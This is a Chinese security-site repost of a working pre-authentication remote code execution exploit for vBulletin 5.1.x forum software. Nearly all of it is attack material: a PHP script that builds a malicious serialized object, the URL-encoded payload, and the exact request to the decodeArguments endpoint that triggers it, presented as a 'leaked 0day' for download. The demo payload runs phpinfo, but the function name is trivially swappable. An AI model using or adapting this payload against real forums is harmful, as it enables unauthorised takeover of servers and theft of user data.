首页 » 漏洞 » 最新vBulletin 5.1.x – 预授权远程代码执行漏洞

最新vBulletin 5.1.x – 预授权远程代码执行漏洞

 

最新vBulletin 5.1.x – 预授权远程代码执行漏洞-安全盒子

0x00 vBulletin

vBulletin 是世界上用户非常广泛的PHP论坛,很多大型论坛都选择vBulletin作为自己的社区,很多大型网站,比如蜂鸟网,51团购,海洋部落,EA,STEAM等。

0x01  Exploit

Download Exploit: Source

# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE :
# I did not discover this exploit, leaked from the IoT.

# Build the object
php << 'eof'
<?php
class vB_Database {
public $functions = array();

public function __construct()
{
$this->functions['free_result'] = 'phpinfo';
}
}

class vB_dB_Result {
protected $db;
protected $recordset;

public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}

print urlencode(serialize(new vB_dB_Result())) . "/n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

#Then hit decodeArguments with your payload :
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

原文链接:最新vBulletin 5.1.x – 预授权远程代码执行漏洞,转载请注明来源!

0